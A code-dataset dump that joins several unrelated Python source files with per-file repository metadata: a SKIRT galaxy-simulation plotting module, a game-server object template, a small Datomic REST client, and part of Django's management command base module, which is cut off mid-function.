'Mgas/Mdust': ( r"$M_\mathrm{gas}/M_\mathrm{dust}$", lambda: divide_if_positive(cd.exported_mass_cold_gas,cd.exported_mass_dust) ),
'fracMgas': ( r"$M_\mathrm{gas}/(M_*+M_\mathrm{gas})$",
lambda: divide_if_positive(cd.exported_mass_cold_gas,cd.original_mass_stars+cd.exported_mass_cold_gas) ),
'logM/L': ( r"$\log_{10}(M_*/L_\mathrm{tot})\,[M_\odot/L_\odot]$",
lambda: log_divide_if_positive(cd.original_mass_stars,cd.setup_luminosity_stars+cd.setup_luminosity_hii_regions) ),
'Mgas/Mhii': ( r"$M_\mathrm{gas}/M_\mathrm{HII}$", lambda: divide_if_positive(cd.exported_mass_cold_gas,cd.exported_mass_hii_regions) ),
# magnitudes and colors
'g': ( r"$M_\mathrm{r}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_g ),
'r': ( r"$M_\mathrm{r}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_r ),
'i': ( r"$M_\mathrm{i}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_i ),
'g-r': ( r"$\mathrm{g}-\mathrm{r}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_g - cd.instr_magnitude_sdss_r ),
'g-i': ( r"$\mathrm{g}-\mathrm{i}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_g - cd.instr_magnitude_sdss_i ),
'i-H': ( r"$\mathrm{i}-\mathrm{H}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_i - cd.instr_magnitude_2mass_h ),
'i-H.zib': ( r"$\mathrm{i}-\mathrm{H}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_sdss_i - cd.instr_magnitude_2mass_h + 1.39 ),
'NUV-r': ( r"$\mathrm{NUV}-\mathrm{r}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_galex_nuv - cd.instr_magnitude_sdss_r ),
'K': ( r"$M_\mathrm{K}\,[\mathrm{mag}]$", lambda: cd.instr_magnitude_2mass_k ),
# flux densities (Jy)
'fmax': ( r"$f_{\nu,\mathrm{max}}\,[\mathrm{kJy}]$",
lambda: np.maximum(cd.instr_xy_fluxdensity_maximum,cd.instr_xz_fluxdensity_maximum,cd.instr_yz_fluxdensity_maximum)/1e3 ),
# ratios of flux densities (Jy/Jy)
'logf250/f500': ( r"$\log_{10}(f_{250}/f_{500})$",
lambda: log_divide_if_positive(cd.instr_fluxdensity_spire_psw_limited,cd.instr_fluxdensity_spire_plw_limited) ),
'logf250/fNUV': ( r"$f_{250}/f_\mathrm{NUV}$",
lambda: log_divide_if_positive(cd.instr_fluxdensity_spire_psw_limited,cd.instr_fluxdensity_galex_nuv) ),
'f250/f350': ( r"$f_{250}/f_{350}$",
lambda: divide_if_positive(cd.instr_fluxdensity_spire_psw_limited,cd.instr_fluxdensity_spire_pmw_limited) ),
'f250/f500': ( r"$f_{250}/f_{500}$",
lambda: divide_if_positive(cd.instr_fluxdensity_spire_psw_limited,cd.instr_fluxdensity_spire_plw_limited) ),
'f350/f500': ( r"$f_{350}/f_{500}$",
lambda: divide_if_positive(cd.instr_fluxdensity_spire_pmw_limited,cd.instr_fluxdensity_spire_plw_limited) ),
# luminosities in specific bands
'logLk': ( r"$\log_{10}(L_\mathrm{K})\,[L_{\odot,\mathrm{K}}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_2mass_k,cd.setup_distance_instrument,'W/Hz')/LsunK) ),
'logL24': ( r"$\log_{10}(L_{24})\,[\mathrm{W}/\mathrm{Hz}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_mips_24,cd.setup_distance_instrument,'W/Hz')) ),
'logL250': ( r"$\log_{10}(L_{250})\,[\mathrm{W}/\mathrm{Hz}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_spire_psw_limited,cd.setup_distance_instrument,'W/Hz')) ),
'logLdust': ( r"$\log_{10}(L_{dust})\,[L_\odot]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_uniform_8_1000,cd.setup_distance_instrument,'W/micron',
wavelength=np.sqrt(8*1000))*(1000-8)/Lsun) ),
'logM/Lh': ( r"$\log_{10}(M_*/L_\mathrm{H})\,[M_\odot/L_{\odot,\mathrm{H}}]$",
lambda: log_divide_if_positive(cd.original_mass_stars,units.luminosityforflux(cd.instr_fluxdensity_2mass_h,cd.setup_distance_instrument,'W/Hz')*LsunH) ),
# other ratios
'logMdust/f350/D2' : ( r"$\log_{10}(M_\mathrm{dust}/(f_{350}D^2))\,[\mathrm{kg}\,\mathrm{W}^{-1}\,\mathrm{Hz}]$",
lambda: log_divide_if_positive(cd.exported_mass_dust*Msun,cd.instr_fluxdensity_spire_pmw_limited*1e-26*(cd.setup_distance_instrument*pc)**2) ),
# observationally derived mass properties
'logMstar.zib': ( r"$\log_{10}(M_{*,\mathrm{zib}})\,[M_\odot]$", lambda: cd.log_stellar_mass_as_zibetti() ),
'logMdust.fit.unlim': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{fit},\mathrm{unlim}})\,[M_\odot]$",
lambda: cd.log_dust_mass_from_grey_body_fit("continuum") ),
'logMdust.fit': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{fit}})\,[M_\odot]$",
lambda: cd.log_dust_mass_from_grey_body_fit("limited") ),
'logMdust.hii.fit': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{HII},\mathrm{fit}})\,[M_\odot]$",
lambda: log_if_positive(cd.dust_temperature_and_mass_from_grey_body_fit("limited")[1] * cd.dust_fraction_in_hii_regions()) ),
'logMdust.other.fit': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{other},\mathrm{fit}})\,[M_\odot]$",
lambda: log_if_positive(cd.dust_temperature_and_mass_from_grey_body_fit("limited")[1] * (1 - cd.dust_fraction_in_hii_regions())) ),
'Mdust.hii.fit/Mdust.fit': ( r"$M_{\mathrm{dust},\mathrm{hii},\mathrm{fit}}/M_{\mathrm{dust},\mathrm{fit}}$",
lambda: cd.dust_fraction_in_hii_regions() ),
'Mdust.hii.fit/Mhii': ( r"$M_{\mathrm{dust},\mathrm{hii},\mathrm{fit}}/M_{\mathrm{HII}}$",
lambda: divide_if_positive(cd.dust_temperature_and_mass_from_grey_body_fit("limited")[1] * cd.dust_fraction_in_hii_regions(), cd.exported_mass_hii_regions) ),
'logMdust.cort': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{cort}})\,[M_\odot]$", lambda: cd.log_dust_mass_as_cortese() ),
'logMdust.grid': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{grid}})\,[M_\odot]$", lambda: cd.log_dust_mass_from_grid_temperature() ),
'logMdust.fit/Mstar.zib': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{fit}}/M_{*,\mathrm{zib}})$",
lambda: cd.log_dust_mass_from_grey_body_fit("limited") - cd.log_stellar_mass_as_zibetti() ),
'logMdust.cort/Mstar.zib': ( r"$\log_{10}(M_{\mathrm{dust},\mathrm{cort}}/M_{*,\mathrm{zib}})$",
lambda: cd.log_dust_mass_as_cortese() - cd.log_stellar_mass_as_zibetti() ),
# dust temperature
'Tdust.fit.unlim': ( r"$T_{\mathrm{dust},\mathrm{fit},\mathrm{unlim}}\,[\mathrm{K}]$",
lambda: cd.dust_temperature_from_grey_body_fit("continuum") ),
'Tdust.fit': ( r"$T_{\mathrm{dust},\mathrm{fit}}\,[\mathrm{K}]$",
lambda: cd.dust_temperature_from_grey_body_fit("limited") ),
'Tdust.grid': ( r"$T_{\mathrm{dust},\mathrm{grid}}\,[\mathrm{K}]$", lambda: cd.probe_average_temperature_dust ),
# public EAGLE database fields (to be provided from column text files)
'K.db': ( r"$M_\mathrm{K,db}\,[\mathrm{mag}]$", lambda: cd.public_database_magnitude_ukidss_k ),
'logLk.db': ( r"$\log_{10}(L_\mathrm{K,db})\,[L_{\odot,\mathrm{K}}]$", lambda: cd.public_database_logluminosity_ukidss_k ),
'logMstar.db': ( r"$\log_{10}(M_{*,\mathrm{db}})\,[M_\odot]$", lambda: log_if_positive(cd.public_database_mass_stars) ),
'logSFR.db': ( r"$\log_{10}(\mathrm{SFR}_\mathrm{db})\,[M_\odot\,\mathrm{year}^{-1}]$",
lambda: log_if_positive(cd.public_database_mass_stars*cd.public_database_specific_star_formation_rate) ),
'logSSFR.db': ( r"$\log_{10}(\mathrm{SFR}_\mathrm{db}/M_{*,\mathrm{db}})\,[\mathrm{year}^{-1}]$",
lambda: log_if_positive(cd.public_database_specific_star_formation_rate) ),
'Zgas.db': ( r"$Z_\mathrm{sfgas,db}$", lambda: cd.public_database_star_forming_gas_metallicity ),
# Star-formation-rate predictions from observations (see Kennicutt-Evans 2012 table 1)
'logSFR.NUV': ( r"$\log_{10}(\mathrm{SFR}_\mathrm{NUV})\,[M_\odot\,\mathrm{year}^{-1}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_galex_nuv,cd.setup_distance_instrument,'erg/s/Hz') \
* c / (1e-6*Filter("GALEX.NUV").pivotwavelength())) - 43.17 ),
'logSFR.24': ( r"$\log_{10}(\mathrm{SFR}_{24\mu\mathrm{m}})\,[M_\odot\,\mathrm{year}^{-1}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_mips_24,cd.setup_distance_instrument,'erg/s/Hz') \
* c / (1e-6*Filter("MIPS.24").pivotwavelength())) - 42.69 ),
'logSFR.TIR': ( r"$\log_{10}(\mathrm{SFR}_\mathrm{TIR})\,[M_\odot\,\mathrm{year}^{-1}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_uniform_3_1100,cd.setup_distance_instrument,'W/micron',
wavelength=np.sqrt(3*1100))*(1100-3)*1e7) - 43.41 ),
'logSFR.Halpha': ( r"$\log_{10}(\mathrm{SFR}_{\mathrm{H}\alpha})\,[M_\odot\,\mathrm{year}^{-1}]$",
lambda: log_if_positive(units.luminosityforflux(cd.instr_fluxdensity_halpha,cd.setup_distance_instrument,'erg/s/Hz') \
* c / 0.6565e-6) - 41.27 ),
}
# -----------------------------------------------------------------
## This function produces a one-page pdf file with one or more plots for the specified SKIRT-run collections.
# It expects the following arguments:
# - collections: a sequence of Collection instances
# - plotname: name of the output plot \em not including the directory, nor the filename extension
# - plotdefs: sequence of plot definitions; each item is a dictionary specifying a single plot as described below
# - pagesize: a 2-tuple specifying the size of the complete page in inch; default is A4 format
# - layout: a 2-tuple specifying the number of columns and rows in the layout of the plots; default is 2 by 3
# (the layout must accomodate all items in the plotdefs sequence)
# - title: title of the plot; default is the value of plotname; specify empty string to omit title
#
# The following table describes the key-value pairs in a plot definition dictionary.
#
#| Key | Presence | Description of Value
#|-----|----------|---------------------
#| x | required | one of the axis type identifiers in the \em axistypes dictionary
#| y | required | one of the axis type identifiers in the \em axistypes dictionary, or 'hist' for a histogram
#| instr | optional | the name of the instrument for which to plot data for both x and y axes; defaults to None
#| xinstr | optional | the name of the instrument for the x axis; defaults to the value of \em instr
#| yinstr | optional, used only if y!='hist' | the name of the instrument for the y axis; defaults to the value of \em instr
#| bins | optional, used only if y=='hist' | the number of bins in a histogram; defaults to 10
#| log | optional, used only if y=='hist' | True for histogram on log scale, False for linear scale (the default)
#| xmin | optional | the minimum x value shown; default is smallest x value
#| xmax | optional | the maximum x value shown; default is largest x value
#| ymin | optional | the minimum y value shown; default is smallest y value
#| ymax | optional | the maximum y value shown; default is largest y value
#| diag | optional | if present and True, a dashed diagonal is drawn from (xmin,ymin) to (xmax,ymax)
#
def plotresults(collections, plotname, plotdefs, layout=(2,3), pagesize=(8.268,11.693), title=None):
global cd # allow assigning to the global variable that holds the current CollectionData instance
np.seterr(invalid='ignore')
# setup the figure
figure = plt.figure(figsize=pagesize)
figure.subplots_adjust(wspace=0.15, hspace=0.23,
left=0.08, right=0.97, top=0.93, bottom=0.1)
colors = ('r', 'g', 'b', 'm', 'c', 'y')
# add figure title
if title==None: title=plotname
if len(title)>0: plt.suptitle(title)
# loop over the plots
plotindex = 0
for plotdef in plotdefs:
# start the appropriate subplot
plotindex += 1
ax = plt.subplot(layout[1], layout[0], plotindex)
# extract the main specifications from the plot definition
xaxis = plotdef['x']
yaxis = plotdef['y']
instr = plotdef.get('instr',None)
xinstr = plotdef.get('xinstr',instr)
yinstr = plotdef.get('yinstr',instr)
# for a regular relation plot...
if yaxis!='hist':
# get the specifications from the axis type definitions
xlabel,xvalue = axistypes[xaxis]
ylabel,yvalue = axistypes[yaxis]
# loop over the collections
for collection,color in zip(collections,colors):
# setup the x and y values for each axes,
# after loading the statistics for the appropriate instrument as global variables
# that can be used in the callables that setup the x and y values for each axis
cd = CollectionData(collection, instrument=xinstr)
x = xvalue()
cd = CollectionData(collection, instrument=yinstr)
y = yvalue()
# create a mask that excludes invalid data (i.e. NaN for one of the axes)
valid = ~(np.isnan(x) | np.isnan(y))
# plot the relation
plt.scatter(x[valid], y[valid], marker='o', s=10, alpha=0.5, edgecolors='k', linewidths=(1,), facecolors=color)
# fit a line through the data and plot it
xmin = plotdef.get('xmin', x[valid].min())
xmax = plotdef.get('xmax', x[valid].max())
if xmin>xmax: xmin,xmax = xmax,xmin
ymin = plotdef.get('ymin', y[valid].min())
ymax = plotdef.get('ymax', y[valid].max())
if ymin>ymax: ymin,ymax = ymax,ymin
valid = valid & (x>=xmin) & (x<=xmax) & (y>=ymin) & (y<=ymax)
if np.any(valid):
rico, y0 = np.polyfit(x[valid], y[valid], 1)
x1 = xmin
x2 = xmax
y1 = y0 + rico*x1
y2 = y0 + rico*x2
plt.plot([x1,x2], [y1,y2], color=color, label=collection.label())
# if requested, plot a dashed diagonal
if plotdef.get('diag', False):
plt.plot([xmin,xmax], [ymin,ymax], color='k', ls='dashed', alpha=0.7)
# for a histogram...
else:
# get the histogram options
bins = plotdef.get('bins', 10)
log = plotdef.get('log', False)
# get the specifications from the x-axis type definition
xlabel,xvalue = axistypes[xaxis]
# setup the y-axis label (force the x-axis instrument to None to avoid changes to the label)
ylabel = r"$\log_{10}(N_\mathrm{galaxies})$" if log else r"$N_\mathrm{galaxies}$"
yinstr = None
# loop over the collections
for collection,color in zip(collections,colors):
# setup the x values in the same way as for a regular plot
cd = CollectionData(collection, instrument=xinstr)
x = xvalue()
# create a mask that excludes invalid data (i.e. NaN)
valid = ~np.isnan(x)
# the plt.hist() function does not support square axes with mixed linear/log scale;
# so, compute the histogram
xmin = plotdef.get('xmin', x[valid].min())
xmax = plotdef.get('xmax', x[valid].max())
counts,binedges = np.histogram(x[valid], bins=bins, range=(xmin,xmax))
if log:
counts[counts<1] = 1
counts = np.log10(counts)
# and, plot the histogram
xpoints = np.zeros(2*len(binedges))
ypoints = np.zeros(2*len(binedges))
xpoints[0::2] = binedges
xpoints[1::2] = binedges
ypoints[1:-1:2] = counts
ypoints[2::2] = counts
plt.plot(xpoints, ypoints, ls='solid', color=color, label=collection.label())
# set the data limits, if requested
plt.xlim( xmin=plotdef.get('xmin'), xmax=plotdef.get('xmax') )
plt.ylim( ymin=plotdef.get('ymin'), ymax=plotdef.get('ymax') )
# make the plot axes square
ax.set_aspect(1./ax.get_data_ratio())
# include instrument names in axis labels if relevant
if xinstr is not None: xlabel += r"$\;\triangleright\mathrm{"+xinstr+"}$"
if yinstr is not None: ylabel += r"$\;\triangleright\mathrm{"+yinstr+"}$"
# add axis labels
plt.xlabel(xlabel, fontsize='medium')
plt.ylabel(ylabel, fontsize='medium')
# fine-tune the tick label size
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize('x-small')
# add a legend
plt.legend(loc='best', prop={'size':'small'})
plt.grid(True)
# save and close the figure
plotfilepath = os.path.join(config.plots_path, plotname+".pdf")
#plt.savefig(plotfilepath, bbox_inches='tight', pad_inches=0.2)
plt.savefig(plotfilepath)
plt.close()
print "Created results plot file", plotfilepath
# -----------------------------------------------------------------
| 62.218023
| 170
| 0.638368
|
4a18c1aabc9c96b8736e35f1409eb6523bfe5ae8
| 449
|
py
|
Python
|
data/scripts/templates/object/mobile/shared_dressed_death_watch_grey.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/mobile/shared_dressed_death_watch_grey.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/mobile/shared_dressed_death_watch_grey.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_death_watch_grey.iff"
result.attribute_template_id = 9
result.stfName("npc_name","human_base_male")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 26.411765
| 70
| 0.732739
|
4a18c1d380a678c04db8c58d5a43a62326156693
| 2,507
|
py
|
Python
|
pydatomic/datomic.py
|
gns24/pydatomic
|
f7e89081a1305b7e916f0d48727d5c588d495ec6
|
[
"MIT"
] | 56
|
2015-01-14T16:38:37.000Z
|
2022-02-24T10:54:53.000Z
|
pydatomic/datomic.py
|
gns24/pydatomic
|
f7e89081a1305b7e916f0d48727d5c588d495ec6
|
[
"MIT"
] | null | null | null |
pydatomic/datomic.py
|
gns24/pydatomic
|
f7e89081a1305b7e916f0d48727d5c588d495ec6
|
[
"MIT"
] | 10
|
2015-01-27T02:53:03.000Z
|
2021-12-06T11:30:24.000Z
|
# -*- coding: utf-8 -*-
import requests
from urlparse import urljoin
from pydatomic.edn import loads
class Database(object):
def __init__(self, name, conn):
self.name = name
self.conn = conn
def __getattr__(self, name):
def f(*args, **kwargs):
return getattr(self.conn, name)(self.name, *args, **kwargs)
return f
class Datomic(object):
def __init__(self, location, storage):
self.location = location
self.storage = storage
def db_url(self, dbname):
return urljoin(self.location, 'data/') + self.storage + '/' + dbname
def create_database(self, dbname):
r = requests.post(self.db_url(''), data={'db-name':dbname})
assert r.status_code in (200, 201), r.text
return Database(dbname, self)
def transact(self, dbname, data):
data = '[%s\n]' % '\n'.join(data)
r = requests.post(self.db_url(dbname)+'/', data={'tx-data':data},
headers={'Accept':'application/edn'})
assert r.status_code in (200, 201), (r.status_code, r.text)
return loads(r.content)
def query(self, dbname, query, extra_args=[], history=False):
args = '[{:db/alias ' + self.storage + '/' + dbname
if history:
args += ' :history true'
args += '} ' + ' '.join(str(a) for a in extra_args) + ']'
r = requests.get(urljoin(self.location, 'api/query'),
params={'args': args, 'q':query},
headers={'Accept':'application/edn'})
assert r.status_code == 200, r.text
return loads(r.content)
def entity(self, dbname, eid):
r = requests.get(self.db_url(dbname) + '/-/entity', params={'e':eid},
headers={'Accept':'application/edn'})
assert r.status_code == 200
return loads(r.content)
if __name__ == '__main__':
q = """[{
:db/id #db/id[:db.part/db]
:db/ident :person/name
:db/valueType :db.type/string
:db/cardinality :db.cardinality/one
:db/doc "A person's name"
:db.install/_attribute :db.part/db}]"""
conn = Datomic('http://localhost:3000/', 'tdb')
db = conn.create_database('cms')
db.transact(q)
db.transact('[{:db/id #db/id[:db.part/user] :person/name "Peter"}]')
r = db.query('[:find ?e ?n :where [?e :person/name ?n]]')
print(r)
eid = r[0][0]
print(db.query('[:find ?n :in $ ?e :where [?e :person/name ?n]]', [eid], history=True))
print(db.entity(eid))
| 34.819444
| 91
| 0.570004
|
4a18c26a3f5479c3d52464f284bfed8ccb8daf69
| 16,883
|
py
|
Python
|
django/core/management/base.py
|
egenerat/gae-django
|
f12379483cf3917ed3cb46ca5ff0b94daf89fc50
|
[
"MIT"
] | 3
|
2016-07-08T23:49:32.000Z
|
2018-04-15T22:55:01.000Z
|
django/core/management/base.py
|
egenerat/gae-django
|
f12379483cf3917ed3cb46ca5ff0b94daf89fc50
|
[
"MIT"
] | 27
|
2017-02-05T15:57:04.000Z
|
2018-04-15T22:57:26.000Z
|
django/core/management/base.py
|
egenerat/gae-django
|
f12379483cf3917ed3cb46ca5ff0b94daf89fc50
|
[
"MIT"
] | null | null | null |
"""
Base classes for writing management commands (named commands which can
be executed through ``django-admin.py`` or ``manage.py``).
"""
import os
import sys
from optparse import make_option, OptionParser
import django
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import color_style
from django.utils.encoding import smart_str
class CommandError(Exception):
"""
Exception class indicating a problem while executing a management
command.
If this exception is raised during the execution of a management
command, it will be caught and turned into a nicely-printed error
message to the appropriate output stream (i.e., stderr); as a
result, raising this exception (with a sensible description of the
error) is the preferred way to indicate that something has gone
wrong in the execution of a command.
"""
pass
def handle_default_options(options):
"""
Include any default options that all commands should accept here
so that ManagementUtility can handle them before searching for
user commands.
"""
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
if options.pythonpath:
sys.path.insert(0, options.pythonpath)
class BaseCommand(object):
"""
The base class from which all management commands ultimately
derive.
Use this class if you want access to all of the mechanisms which
parse the command-line arguments and work out what code to call in
response; if you don't need to change any of that behavior,
consider using one of the subclasses defined in this file.
If you are interested in overriding/customizing various aspects of
the command-parsing and -execution behavior, the normal flow works
as follows:
1. ``django-admin.py`` or ``manage.py`` loads the command class
and calls its ``run_from_argv()`` method.
2. The ``run_from_argv()`` method calls ``create_parser()`` to get
an ``OptionParser`` for the arguments, parses them, performs
any environment changes requested by options like
``pythonpath``, and then calls the ``execute()`` method,
passing the parsed arguments.
3. The ``execute()`` method attempts to carry out the command by
calling the ``handle()`` method with the parsed arguments; any
output produced by ``handle()`` will be printed to standard
output and, if the command is intended to produce a block of
SQL statements, will be wrapped in ``BEGIN`` and ``COMMIT``.
4. If ``handle()`` raised a ``CommandError``, ``execute()`` will
instead print an error message to ``stderr``.
Thus, the ``handle()`` method is typically the starting point for
subclasses; many built-in commands and command types either place
all of their logic in ``handle()``, or perform some additional
parsing work in ``handle()`` and then delegate from it to more
specialized methods as needed.
Several attributes affect behavior at various steps along the way:
``args``
A string listing the arguments accepted by the command,
suitable for use in help messages; e.g., a command which takes
a list of application names might set this to '<appname
appname ...>'.
``can_import_settings``
A boolean indicating whether the command needs to be able to
import Django settings; if ``True``, ``execute()`` will verify
that this is possible before proceeding. Default value is
``True``.
``help``
A short description of the command, which will be printed in
help messages.
``option_list``
This is the list of ``optparse`` options which will be fed
into the command's ``OptionParser`` for parsing arguments.
``output_transaction``
A boolean indicating whether the command outputs SQL
statements; if ``True``, the output will automatically be
wrapped with ``BEGIN;`` and ``COMMIT;``. Default value is
``False``.
``requires_model_validation``
A boolean; if ``True``, validation of installed models will be
performed prior to executing the command. Default value is
``True``. To validate an individual application's models
rather than all applications' models, call
``self.validate(app)`` from ``handle()``, where ``app`` is the
application's Python module.
"""
# Metadata about this command.
option_list = (
make_option('-v', '--verbosity', action='store', dest='verbosity', default='1',
type='choice', choices=['0', '1', '2', '3'],
help='Verbosity level; 0=minimal output, 1=normal output, 2=all output'),
make_option('--settings',
help='The Python path to a settings module, e.g. "myproject.settings.main". If this isn\'t provided, the DJANGO_SETTINGS_MODULE environment variable will be used.'),
make_option('--pythonpath',
help='A directory to add to the Python path, e.g. "/home/djangoprojects/myproject".'),
make_option('--traceback', action='store_true',
help='Print traceback on exception'),
)
help = ''
args = ''
# Configuration shortcuts that alter various logic.
can_import_settings = True
requires_model_validation = True
output_transaction = False # Whether to wrap the output in a "BEGIN; COMMIT;"
def __init__(self):
self.style = color_style()
def get_version(self):
"""
Return the Django version, which should be correct for all
built-in Django commands. User-supplied commands should
override this method.
"""
return django.get_version()
def usage(self, subcommand):
"""
Return a brief description of how to use this command, by
default from the attribute ``self.help``.
"""
usage = '%%prog %s [options] %s' % (subcommand, self.args)
if self.help:
return '%s\n\n%s' % (usage, self.help)
else:
return usage
def create_parser(self, prog_name, subcommand):
"""
Create and return the ``OptionParser`` which will be used to
parse the arguments to this command.
"""
return OptionParser(prog=prog_name,
usage=self.usage(subcommand),
version=self.get_version(),
option_list=self.option_list)
def print_help(self, prog_name, subcommand):
"""
Print the help message for this command, derived from
``self.usage()``.
"""
parser = self.create_parser(prog_name, subcommand)
parser.print_help()
def run_from_argv(self, argv):
"""
Set up any environment changes requested (e.g., Python path
and Django settings), then run this command.
"""
parser = self.create_parser(argv[0], argv[1])
options, args = parser.parse_args(argv[2:])
handle_default_options(options)
self.execute(*args, **options.__dict__)
def execute(self, *args, **options):
"""
Try to execute this command, performing model validation if
needed (as controlled by the attribute
``self.requires_model_validation``). If the command raises a
``CommandError``, intercept it and print it sensibly to
stderr.
"""
# Switch to English, because django-admin.py creates database content
# like permissions, and those shouldn't contain any translations.
# But only do this if we can assume we have a working settings file,
# because django.utils.translation requires settings.
if self.can_import_settings:
try:
from django.utils import translation
translation.activate('en-us')
except ImportError, e:
# If settings should be available, but aren't,
# raise the error and quit.
sys.stderr.write(smart_str(self.style.ERROR('Error: %s\n' % e)))
sys.exit(1)
try:
self.stdout = options.get('stdout', sys.stdout)
self.stderr = options.get('stderr', sys.stderr)
if self.requires_model_validation:
self.validate()
output = self.handle(*args, **options)
if output:
if self.output_transaction:
# This needs to be imported here, because it relies on
# settings.
from django.db import connections, DEFAULT_DB_ALIAS
connection = connections[options.get('database', DEFAULT_DB_ALIAS)]
if connection.ops.start_transaction_sql():
self.stdout.write(self.style.SQL_KEYWORD(connection.ops.start_transaction_sql()) + '\n')
self.stdout.write(output)
if self.output_transaction:
self.stdout.write('\n' + self.style.SQL_KEYWORD("COMMIT;") + '\n')
except CommandError, e:
self.stderr.write(smart_str(self.style.ERROR('Error: %s\n' % e)))
sys.exit(1)
def validate(self, app=None, display_num_errors=False):
"""
Validates the given app, raising CommandError for any errors.
If app is None, then this will validate all installed apps.
"""
from django.core.management.validation import get_validation_errors
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
s = StringIO()
num_errors = get_validation_errors(s, app)
if num_errors:
s.seek(0)
error_text = s.read()
raise CommandError("One or more models did not validate:\n%s" % error_text)
if display_num_errors:
self.stdout.write("%s error%s found\n" % (num_errors, num_errors != 1 and 's' or ''))
def handle(self, *args, **options):
"""
The actual logic of the command. Subclasses must implement
this method.
"""
raise NotImplementedError()
class AppCommand(BaseCommand):
"""
A management command which takes one or more installed application
names as arguments, and does something with each of them.
Rather than implementing ``handle()``, subclasses must implement
``handle_app()``, which will be called once for each application.
"""
args = '<appname appname ...>'
def handle(self, *app_labels, **options):
from django.db import models
if not app_labels:
raise CommandError('Enter at least one appname.')
try:
app_list = [models.get_app(app_label) for app_label in app_labels]
except (ImproperlyConfigured, ImportError), e:
raise CommandError("%s. Are you sure your INSTALLED_APPS setting is correct?" % e)
output = []
for app in app_list:
app_output = self.handle_app(app, **options)
if app_output:
output.append(app_output)
return '\n'.join(output)
def handle_app(self, app, **options):
"""
Perform the command's actions for ``app``, which will be the
Python module corresponding to an application name given on
the command line.
"""
raise NotImplementedError()
class LabelCommand(BaseCommand):
"""
A management command which takes one or more arbitrary arguments
(labels) on the command line, and does something with each of
them.
Rather than implementing ``handle()``, subclasses must implement
``handle_label()``, which will be called once for each label.
If the arguments should be names of installed applications, use
``AppCommand`` instead.
"""
args = '<label label ...>'
label = 'label'
def handle(self, *labels, **options):
if not labels:
raise CommandError('Enter at least one %s.' % self.label)
output = []
for label in labels:
label_output = self.handle_label(label, **options)
if label_output:
output.append(label_output)
return '\n'.join(output)
def handle_label(self, label, **options):
"""
Perform the command's actions for ``label``, which will be the
string as given on the command line.
"""
raise NotImplementedError()
class NoArgsCommand(BaseCommand):
"""
A command which takes no arguments on the command line.
Rather than implementing ``handle()``, subclasses must implement
``handle_noargs()``; ``handle()`` itself is overridden to ensure
no arguments are passed to the command.
Attempting to pass arguments will raise ``CommandError``.
"""
args = ''
def handle(self, *args, **options):
if args:
raise CommandError("Command doesn't accept any arguments")
return self.handle_noargs(**options)
def handle_noargs(self, **options):
"""
Perform this command's actions.
"""
raise NotImplementedError()
def copy_helper(style, app_or_project, name, directory, other_name=''):
"""
Copies either a Django application layout template or a Django project
layout template into the specified directory.
"""
# style -- A color style object (see django.core.management.color).
# app_or_project -- The string 'app' or 'project'.
# name -- The name of the application or project.
# directory -- The directory to which the layout template should be copied.
# other_name -- When copying an application layout, this should be the name
# of the project.
import re
import shutil
other = {'project': 'app', 'app': 'project'}[app_or_project]
if not re.search(r'^[_a-zA-Z]\w*$', name): # If it's not a valid directory name.
# Provide a smart error message, depending on the error.
if not re.search(r'^[_a-zA-Z]', name):
message = 'make sure the name begins with a letter or underscore'
else:
message = 'use only numbers, letters and underscores'
raise CommandError("%r is not a valid %s name. Please %s." % (name, app_or_project, message))
top_dir = os.path.join(directory, name)
try:
os.mkdir(top_dir)
except OSError, e:
raise CommandError(e)
# Determine where the app or project templates are. Use
# django.__path__[0] because we don't know into which directory
# django has been installed.
template_dir = os.path.join(django.__path__[0], 'conf', '%s_template' % app_or_project)
for d, subdirs, files in os.walk(template_dir):
relative_dir = d[len(template_dir)+1:].replace('%s_name' % app_or_project, name)
if relative_dir:
os.mkdir(os.path.join(top_dir, relative_dir))
for subdir in subdirs[:]:
if subdir.startswith('.'):
subdirs.remove(subdir)
for f in files:
if not f.endswith('.py'):
# Ignore .pyc, .pyo, .py.class etc, as they cause various
# breakages.
continue
path_old = os.path.join(d, f)
path_new = os.path.join(top_dir, relative_dir, f.replace('%s_name' % app_or_project, name))
fp_old = open(path_old, 'r')
